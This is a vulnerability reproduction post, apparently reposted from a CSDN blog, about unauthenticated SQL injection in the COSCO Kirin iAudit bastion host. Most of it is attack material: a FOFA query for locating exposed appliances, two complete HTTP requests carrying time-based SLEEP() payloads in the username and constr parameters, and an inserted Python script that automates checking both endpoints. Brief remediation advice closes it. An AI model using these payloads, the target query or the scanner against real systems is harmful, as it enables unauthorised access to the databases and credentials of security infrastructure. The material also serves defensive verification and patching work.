COSCO Kirin Bastion Host SQL Injection Vulnerability Reproduction

0x01 Product Introduction

Drawing on its own research and development capability and industry experience, COSCO Kirin has developed a new generation of integrated hardware and software security operation and maintenance platform, the iAudit Unified Security Operation and Maintenance Platform. The product provides unified identity authentication, unified authorization, unified auditing and unified monitoring for enterprise operation and maintenance staff, closing the blind spots of the traditional operation and maintenance process and making operations simpler, controllable and visible. The vendor positions it as a management platform for enterprise IT internal control.

0x02 Vulnerability Overview

There is a SQL injection vulnerability in the /admin.php (controller=admin_commonuser, username parameter) and /baoleiji/api/tokens (constr parameter) endpoints of the COSCO Kirin bastion host. Both endpoints accept requests without authentication, so an unauthenticated attacker can use the injection to extract sensitive database contents and credentials, and the heavy or SLEEP()-based queries used for blind extraction may eventually crash the server. The PoCs below demonstrate the flaw as a time-based blind injection, which is the least intrusive way to confirm it.

0x03 Reproduction Environment

FOFA: cert.subject="Baolei"

0x04 Vulnerability Reproduction

PoC-1

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

The response is delayed by about 5 seconds, confirming that the username parameter reaches a MySQL query unescaped and that the injected SLEEP(5) is executed (time-based blind injection). Compare against the response time of a benign username first; a host that is slow for every request is not evidence of injection.

PoC-2

If https://your-ip/baoleiji/api/tokens is reachable, the host is likely vulnerable; confirm with the following request.

POST /baoleiji/api/tokens HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

constr=1' AND (SELECT 6999 FROM (SELECT(SLEEP(10)))ptGN) AND'AAdm'='AAdm&title=%40127.0.0.1

The response is delayed by about 10 seconds, confirming the same time-based blind injection in the constr parameter (the title parameter is only needed for the request to reach the query).
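The script below is added here as an example and is not code from the original post or from the vendor. It automates both PoCs above as a time-based blind injection check: it builds the benign and injected form bodies for each endpoint, interleaves benign and injected requests, and compares median response times, so a host that is slow but patched is not flagged. The SimulatedTarget class, the send and clock callables, the 0.5 s tolerance and the 0.12 s base latency are assumptions made so the example runs offline; against a real host, send would wrap your HTTP client's POST and clock would be time.monotonic.

```python
"""Time-based blind SQL injection check for the two endpoints in the PoCs.

Added example (not code from the original post). The target is simulated
offline; against a real host, `send` would perform the actual HTTP POST.
"""
import re
import statistics
import time
from typing import Callable, Dict, List, Tuple
from urllib.parse import unquote_plus, urlencode

# The injection fragment used by both PoCs, with the SLEEP() seconds as a parameter.
SLEEP_FRAGMENT = "' AND (SELECT 6999 FROM (SELECT(SLEEP({delay})))ptGN) AND 'AAdm'='AAdm"

Form = Dict[str, str]
Sender = Callable[[str, str], None]  # (path, urlencoded body) -> None


def build_requests(delay: int) -> Dict[str, Tuple[Form, Form]]:
    """Benign and injected form bodies for each endpoint, keyed by path."""
    inj = SLEEP_FRAGMENT.format(delay=delay)
    return {
        "/admin.php?controller=admin_commonuser": (
            {"username": "admin"},
            {"username": "admin" + inj},
        ),
        "/baoleiji/api/tokens": (
            {"constr": "1", "title": "@127.0.0.1"},
            {"constr": "1" + inj, "title": "@127.0.0.1"},
        ),
    }


def time_request(send: Sender, path: str, form: Form, clock: Callable[[], float]) -> float:
    """Send one form body and return the elapsed wall-clock seconds."""
    t0 = clock()
    send(path, urlencode(form))
    return clock() - t0


def is_time_injectable(send: Sender, path: str, benign: Form, injected: Form,
                       delay: int, trials: int = 3,
                       clock: Callable[[], float] = time.monotonic,
                       tolerance: float = 0.5) -> bool:
    """True if injected requests take at least `delay - tolerance` seconds longer
    than benign ones. Benign and injected requests are interleaved and medians
    compared, so a uniformly slow host or one jittery sample is not misreported."""
    base: List[float] = []
    inj: List[float] = []
    for _ in range(trials):
        base.append(time_request(send, path, benign, clock))
        inj.append(time_request(send, path, injected, clock))
    return statistics.median(inj) - statistics.median(base) >= delay - tolerance


def scan(send: Sender, delay: int = 5, trials: int = 3,
         clock: Callable[[], float] = time.monotonic) -> Dict[str, bool]:
    """Run the check against both endpoints and report which ones execute SLEEP()."""
    return {
        path: is_time_injectable(send, path, benign, injected, delay, trials, clock)
        for path, (benign, injected) in build_requests(delay).items()
    }


class SimulatedTarget:
    """Offline stand-in for the appliance (constructed for this example, not a real client).

    A request to a vulnerable path whose body contains SLEEP(n) advances a fake
    clock by n seconds, mimicking MySQL executing the injected expression."""
    _SLEEP = re.compile(r"SLEEP\((\d+)\)")

    def __init__(self, vulnerable_paths: List[str], base_latency: float = 0.12) -> None:
        self.vulnerable = set(vulnerable_paths)
        self.base_latency = base_latency  # assumed per-request latency, in seconds
        self.now = 0.0

    def clock(self) -> float:
        return self.now

    def send(self, path: str, body: str) -> None:
        self.now += self.base_latency
        if path in self.vulnerable:
            # urlencode percent-encodes the parentheses, so decode before matching.
            m = self._SLEEP.search(unquote_plus(body))
            if m:
                self.now += int(m.group(1))


if __name__ == "__main__":
    endpoints = list(build_requests(5))
    vulnerable = SimulatedTarget(endpoints)
    print("unpatched:", scan(vulnerable.send, delay=5, clock=vulnerable.clock))
    # A patched host that is merely slow (3 s per request) must not be flagged.
    slow_patched = SimulatedTarget([], base_latency=3.0)
    print("patched:  ", scan(slow_patched.send, delay=5, clock=slow_patched.clock))
```

Running the script reports both endpoints as injectable on the simulated unpatched host and neither on the slow patched one. The median comparison is the part worth keeping when adapting this to a real scanner: a single delayed response on a loaded appliance is a common false positive, and interleaving the benign requests keeps the baseline current if server load changes during the test.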

0x05 Remediation

Restrict access to the management interface by source address and do not expose the system to the Internet unless strictly necessary. Both vulnerable endpoints are reachable without authentication, so network exposure alone is enough for exploitation.

Upgrade to a fixed version or apply the vendor patch. Blocking payload keywords such as SLEEP( in the username and constr parameters at a WAF only raises the bar for an attacker and should not be treated as a fix.


Source: https://blog.csdn.net/qq_41904294/article/details/132328217